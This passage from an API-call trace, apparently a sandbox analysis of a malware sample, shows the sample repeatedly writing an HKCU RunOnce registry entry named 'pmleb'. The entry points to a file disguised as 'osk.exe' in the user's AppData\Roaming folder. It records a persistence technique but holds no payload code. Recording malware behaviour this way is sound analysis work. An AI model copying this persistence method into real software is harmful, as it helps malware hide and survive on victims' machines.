uElapse=0xa, lpTimerFunc=0x0) returned 0x202f [0079.257] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.269] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.269] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.269] KillTimer (hWnd=0x20280, uIDEvent=0x202f) returned 1 [0079.269] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.270] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.270] IUnknown:Release (This=0x787518) returned 0x1 [0079.270] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, 
[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.270] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.270] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.270] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.271] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0079.271] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.271] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x31 [0079.271] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.271] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0079.271] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.271] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.271] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.272] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.272] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.272] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.272] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.272] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.272] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.272] RegCloseKey (hKey=0x280) returned 0x0 [0079.272] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.272] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.272] SetTimer (hWnd=0x20280, nIDEvent=0x2030, uElapse=0xa, lpTimerFunc=0x0) returned 0x2030 [0079.273] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.285] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.285] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.285] KillTimer (hWnd=0x20280, uIDEvent=0x2030) returned 1 [0079.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.285] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.285] IUnknown:Release (This=0x787518) returned 0x1 [0079.285] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0079.285] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.286] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.286] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.286] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0079.286] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.286] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x32 [0079.286] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.287] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0079.287] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.287] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.287] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.287] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.287] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.287] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.287] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.287] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.288] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.288] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.288] RegCloseKey (hKey=0x280) returned 0x0 [0079.288] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.288] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.288] SetTimer (hWnd=0x20280, nIDEvent=0x2031, uElapse=0xa, lpTimerFunc=0x0) returned 0x2031 [0079.288] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.300] KillTimer (hWnd=0x20280, uIDEvent=0x2031) returned 1 [0079.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.301] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.301] IUnknown:Release (This=0x787518) returned 0x1 [0079.301] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.301] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.301] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.301] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.302] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.302] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.302] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0079.302] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.302] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x33 [0079.302] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.303] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 
[0079.303] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.303] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.303] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.303] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.303] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.303] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.303] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
